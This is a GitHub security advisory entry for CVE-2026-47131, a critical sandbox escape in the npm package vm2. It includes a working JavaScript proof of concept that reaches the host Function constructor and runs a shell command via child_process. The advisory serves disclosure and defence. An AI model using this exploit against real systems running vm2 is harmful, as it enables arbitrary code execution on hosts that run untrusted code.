GHSA-v6mx-mf47-r5wg
Suggest an improvement- Source
- https://github.com/advisories/GHSA-v6mx-mf47-r5wg
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-v6mx-mf47-r5wg/GHSA-v6mx-mf47-r5wg.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-v6mx-mf47-r5wg
- Aliases
-
- CVE-2026-47131
- Downstream
- Published
- 2026-05-29T17:33:58Z
- Modified
- 2026-06-12T21:00:09.243785811Z
- Severity
-
- 10.0 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H CVSS Calculator
- Summary
- vm2 has a Sandbox Escape issue
- Details
-
Summary
By combining
Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__"),Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__"), and Node.js'sERR_INVALID_ARG_TYPEError, the host'sTypeErrorconstructor can be obtained, which allows the escape from the sandbox. This allows attackers to run arbitrary code.PoC
"use strict"; const { VM } = require("vm2"); const vm = new VM(); vm.run(` "use strict"; const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__"); const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__"); async function f() { try { await WebAssembly.compileStreaming(); } catch(e) { setProto.call(getProto.call(e), null); } try { await WebAssembly.compileStreaming(); } catch(e) { const HostFunction = e.constructor.constructor; new HostFunction("return process")().mainModule.require("child_process").execSync("echo pwned", { stdio: "inherit" }); } } f(); `);Impact
Sandbox Escape → RCE
- Database specific
{ "nvd_published_at": "2026-06-12T15:16:27Z", "github_reviewed_at": "2026-05-29T17:33:58Z", "github_reviewed": true, "severity": "CRITICAL", "cwe_ids": [ "CWE-913" ] }- References
Affected packages
npm / vm2
Package
- Name
- vm2
- View open source insights on deps.dev
- Purl
- pkg:npm/vm2